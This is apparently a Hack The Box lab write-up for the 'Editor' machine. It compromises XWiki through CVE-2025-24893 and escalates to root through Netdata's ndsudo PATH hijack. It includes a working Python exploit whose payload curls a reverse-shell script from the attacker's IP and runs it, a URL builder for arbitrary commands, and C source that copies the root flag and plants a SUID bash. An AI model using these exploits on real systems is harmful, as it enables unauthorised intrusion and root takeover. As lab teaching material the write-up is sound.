Editor - Easy - Linux
Port Scan
The port scan shows SSH on 22 and two web servers. nginx on port 80 redirects to http://editor.htb/, so editor.htb needs an /etc/hosts entry before browsing. Jetty on port 8080 serves the application itself: the page title (XWiki - Main - Intro), the JSESSIONID cookie and the robots.txt entries under /xwiki/bin/ identify it as XWiki.
# Nmap 7.95 scan initiated Sat Aug 2 16:38:29 2025 as: /usr/lib/nmap/nmap -sCV -p- -v -oN portscan.log 10.129.88.163
Nmap scan report for 10.129.88.163
Host is up (0.032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open http Jetty 10.0.20
| http-methods:
| Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan:
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| Server Type: Jetty(10.0.20)
|_ WebDAV type: Unknown
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.129.88.163:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 2 16:38:54 2025 -- 1 IP address (1 host up) scanned in 25.23 seconds
Inspecting Port 8080
The below screenshot shows the homepage of the XWiki web application.
Researching XWiki
Project Link: https://github.com/xwiki/xwiki-platform
XWiki is a light and powerful development platform that allows you to customize the wiki to your specific needs.
CVE-2025-24893
https://nvd.nist.gov/vuln/detail/CVE-2025-24893
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to <host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20. If there is an output, and the title of the RSS feed contains Hello from search text:42, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit Main.SolrSearchMacros in SolrSearchMacros.xml on line 955 to match the rawResponse macro in macros.vm#L2824 with a content type of application/xml, instead of simply outputting the content of the feed.
Exploit Script
Below is the script I used to obtain remote code execution on the target. The entire text parameter has to be URL encoded, wiki-macro braces included, or the injection is not parsed. The payload makes the target curl a reverse-shell script from my web server, save it to disk and then execute it. For unknown reasons the payload would fail if it was piped directly into bash. One thing to be aware of with this technique: Groovy's String.execute() hands the string to Runtime.exec(), which splits it on whitespace and does not go through a shell, so operators such as | and && reach curl as ordinary arguments rather than being interpreted. If a chained command misbehaves, run it through a shell explicitly with ['bash','-c','...'].execute().
import requests
import urllib.parse

# Exploit function: builds the CVE-2025-24893 SolrSearch request and sends it.
def exploit(base_url, payload):
    # The command must be percent-encoded; unencoded characters break the
    # wiki-macro parsing of the text parameter.
    encoded_payload = urllib.parse.quote(payload)
    exploit_url = (
        f"{base_url}/xwiki/bin/get/Main/SolrSearch?"
        # }}} closes the macro the search text is embedded in, then an async
        # macro wraps a groovy macro so the code is evaluated during rendering.
        f"media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d"
        # String.execute() runs the command; println() drops its stdout
        # into the generated RSS feed.
        f"println({encoded_payload}.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
    )
    try:
        print(f"[+] Sending request to: {exploit_url}")
        response = requests.get(exploit_url, timeout=10)
        # "root:" is the tell-tale for a cat /etc/passwd test payload; with the
        # reverse-shell payload below, watch the listener rather than this check.
        if response.status_code == 200 and "root:" in response.text:
            print("[✔] Exploit successful! Output received:")
            print(response.text)
        else:
            print(f"[✖] Exploit failed. Status code: {response.status_code}")
    except requests.exceptions.ConnectionError:
        print("[✖] Connection failed. Target may be down.")
    except requests.exceptions.Timeout:
        print("[✖] Request timed out. Target is slow or unresponsive.")
    except requests.exceptions.RequestException as e:
        print(f"[✖] Unexpected error: {e}")

# Main execution
if __name__ == "__main__":
    base_url = "http://editor.htb:8080"
    # Single quotes make this a Groovy string literal inside println(...).
    payload = "'curl 10.10.14.103/shell -o /tmp/shell && bash /tmp/shell'"
    exploit(base_url, payload)
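As an added example (not the script above and not XWiki project code), the following Python builds the same SolrSearch request from its unencoded wiki-syntax form, so the encoding is done by urllib.parse.quote rather than by hand, adds the non-destructive 23 + 19 probe from the advisory, and checks a response the way the advisory describes, by looking for the marker in the RSS feed title. The command form wraps the payload in bash -c because Groovy's String.execute() does not invoke a shell. The host name, the sample RSS bodies and the echo command are constructed for illustration, not captured from the target.

```python
import urllib.parse
import xml.etree.ElementTree as ET

# Canary from the advisory probe: println("Hello from" + " search text:" + (23 + 19))
PROBE_MARKER = "Hello from search text:42"


def build_search_text(groovy_code: str) -> str:
    """Wrap Groovy in the wiki syntax that escapes the SolrSearch macro.

    The leading }}} closes the macro that SolrSearchMacros embeds the user
    text in; an async macro then evaluates a groovy macro inline.
    """
    return "}}}{{async async=false}}{{groovy}}" + groovy_code + "{{/groovy}}{{/async}}"


def build_url(base_url: str, groovy_code: str) -> str:
    """Full GET URL with the text parameter percent-encoded in its entirety."""
    text = urllib.parse.quote(build_search_text(groovy_code), safe="")
    return f"{base_url.rstrip('/')}/xwiki/bin/get/Main/SolrSearch?media=rss&text={text}"


def probe_url(base_url: str) -> str:
    """Non-destructive check from the advisory: prints 23 + 19 into the feed."""
    return build_url(base_url, 'println("Hello from" + " search text:" + (23 + 19))')


def command_url(base_url: str, command: str) -> str:
    """URL that runs `command` through bash -c and echoes its stdout into the feed.

    Groovy's String.execute() calls Runtime.exec() on whitespace-split tokens,
    so shell operators such as | and && would reach the program as literal
    arguments. Passing a list runs bash explicitly, which interprets them.
    """
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    groovy = f"println(['bash', '-c', '{escaped}'].execute().text)"
    return build_url(base_url, groovy)


def feed_title(rss_xml: str) -> str:
    """Title of the RSS channel, or '' when the body does not parse as RSS."""
    try:
        root = ET.fromstring(rss_xml)
    except ET.ParseError:
        return ""
    channel = root.find("channel")
    return (channel.findtext("title") if channel is not None else "") or ""


def is_vulnerable(rss_xml: str) -> bool:
    """True when the Groovy output was rendered into the feed title."""
    return PROBE_MARKER in feed_title(rss_xml)


# Constructed sample responses (not captured from the target) for offline use.
SAMPLE_VULNERABLE = (
    '<rss version="2.0"><channel>'
    "<title>RSS feed for search on [Hello from search text:42\n]</title>"
    "<link>http://editor.htb:8080/xwiki/bin/view/Main/</link>"
    "</channel></rss>"
)
SAMPLE_PATCHED = (
    '<rss version="2.0"><channel>'
    "<title>RSS feed for search on [}}}{{async async=false}}{{groovy}}println(...)]</title>"
    "</channel></rss>"
)

if __name__ == "__main__":
    print(probe_url("http://editor.htb:8080"))
    print(command_url("http://editor.htb:8080", "id"))
    print("sample vulnerable:", is_vulnerable(SAMPLE_VULNERABLE))
    print("sample patched:", is_vulnerable(SAMPLE_PATCHED))
```

For a live check, fetch probe_url(...) with any HTTP client and pass the response body to is_vulnerable(); only after that returns True is it worth sending a command_url(...). Percent-encoding with safe="" is deliberate: quote() would otherwise leave / untouched, and the closing {{/groovy}} tag must arrive encoded like everything else.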
Reverse Shell Obtained
The below screenshot shows the target reaching out to my web server which hosts the reverse shell payload.
Reverse shell obtained as the xwiki user.
Inspecting XWiki Configuration Files
Searching the file system for configuration files eventually turned up the database credentials, as shown below (XWiki keeps its database connection settings in the webapp's WEB-INF/hibernate.cfg.xml). I did inspect the MySQL database for hashes and found one for a user named neal. It was not possible to crack the hash, and that turned out to be a waste of time.
Password Reuse Test
There is a user called oliver on the target. The database password was reused: it was valid for the oliver user and granted access via SSH.
Inspecting Netdata (/opt/netdata)
Project Link: https://github.com/netdata/netdata
Netdata is an open-source, real-time infrastructure monitoring platform. Monitor, detect, and act across your entire infrastructure.
PE - ndsudo
https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
The ndsudo tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions.
Exploiting ndsudo
It is worth mentioning that my first attempt involved tricking the binary into executing a bash script. I discovered that when ndsudo executed the bash script it would not preserve root privileges: bash resets its effective UID to the real UID when the two differ, unless it is started with -p. To work around this it was necessary to compile a binary that calls setuid(0), which succeeds because ndsudo runs it with an effective UID of 0, and then executes a system command. The source code has been included below for reference.
#include <unistd.h>
#include <stdlib.h>

/* Runs under ndsudo with effective UID 0. setuid(0) makes the real UID 0 as
 * well, so bash (and anything spawned from it) keeps root instead of
 * dropping back to the calling user. */
int main(void) {
    if (setuid(0) != 0) {
        return 1; /* not running with euid 0: the hijack did not take */
    }
    /* Grab the flag, leave a SUID copy of bash behind, and drop into it with -p. */
    system("cat /root/root.txt > /tmp/flag.txt && cp /bin/bash /tmp/bash && chmod u+s /tmp/bash && /tmp/bash -p");
    return 0;
}
The below screenshot shows how the payload was compiled and named nvme, the program name ndsudo will look up.
The next screenshot shows the payload being transferred onto the target and given executable permissions. PATH was then modified so that /tmp, where the payload is located, is searched first.
Running ndsudo with the nvme-list parameter causes it to execute a binary called nvme. Because ndsudo resolves that name through PATH rather than using an absolute path, the lookup was hijacked by putting /tmp ahead of the system directories. The payload ran with root privileges preserved, so the system command executed as root.
The final screenshot shows the entire process and the successful result: a root shell and the root flag.
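The lookup that makes this work is an ordinary search of PATH for the bare name nvme. The following Python is added here as an illustration and is not part of the original write-up or of Netdata: it builds a throw-away directory tree standing in for the target and shows both halves of the technique, which file an unqualified nvme resolves to under each PATH order, and the check for a writable directory ahead of the real binary that decides whether the hijack is possible at all. The directory names, PATH strings and the "real nvme" script are constructed for the demo; the same hijack_plan() check is what to run against the PATH a setuid helper actually uses when auditing one.

```python
import os
import shutil
import tempfile


def resolve_in_path(command: str, path: str):
    """First executable named `command` found walking `path` left to right.

    shutil.which() mirrors the execvp()-style lookup a setuid helper performs
    when it runs a bare program name instead of an absolute path.
    """
    return shutil.which(command, path=path)


def hijack_plan(command: str, path: str):
    """Directory an attacker could plant a fake `command` in, or None.

    Walks `path` in lookup order and returns the first directory the current
    user can write to that is reached before the genuine `command`. This is
    the precondition behind the ndsudo PATH hijack, and also the thing to
    audit on any setuid program that resolves helpers through PATH.
    """
    for directory in path.split(os.pathsep):
        if not directory or not os.path.isdir(directory):
            continue
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return None  # the real binary wins the lookup; nothing to hijack
        if os.access(directory, os.W_OK):
            return directory
    return None


def write_executable(directory: str, command: str,
                     body: str = "#!/bin/sh\necho hijacked\n") -> str:
    """Drop an executable named `command` into `directory` (the planting step)."""
    target = os.path.join(directory, command)
    with open(target, "w") as fh:
        fh.write(body)
    os.chmod(target, 0o755)
    return target


def build_demo_tree() -> dict:
    """Constructed stand-in for the target: an 'sbin' holding the real nvme and
    an empty, writable 'tmp', with PATH strings for both orderings."""
    root = tempfile.mkdtemp(prefix="ndsudo-demo-")
    sbin = os.path.join(root, "sbin")
    tmp = os.path.join(root, "tmp")
    os.makedirs(sbin)
    os.makedirs(tmp)
    write_executable(sbin, "nvme", "#!/bin/sh\necho real nvme\n")
    return {
        "root": root,
        "sbin": sbin,
        "tmp": tmp,
        "secure_path": os.pathsep.join([sbin, tmp]),
        "hijacked_path": os.pathsep.join([tmp, sbin]),
    }


def remove_demo_tree(tree: dict) -> None:
    """Clean up the constructed tree."""
    shutil.rmtree(tree["root"], ignore_errors=True)


if __name__ == "__main__":
    tree = build_demo_tree()
    print("secure PATH resolves nvme to:", resolve_in_path("nvme", tree["secure_path"]))
    print("writable dir ahead of nvme (secure PATH):", hijack_plan("nvme", tree["secure_path"]))
    print("writable dir ahead of nvme (hijacked PATH):", hijack_plan("nvme", tree["hijacked_path"]))
    write_executable(tree["tmp"], "nvme")
    print("hijacked PATH now resolves nvme to:", resolve_in_path("nvme", tree["hijacked_path"]))
    remove_demo_tree(tree)
```

The fix on the defending side follows from the same function: a setuid helper should execute its commands by absolute path (or reset PATH to a fixed, root-owned list) so that hijack_plan() never finds a writable directory ahead of the target binary.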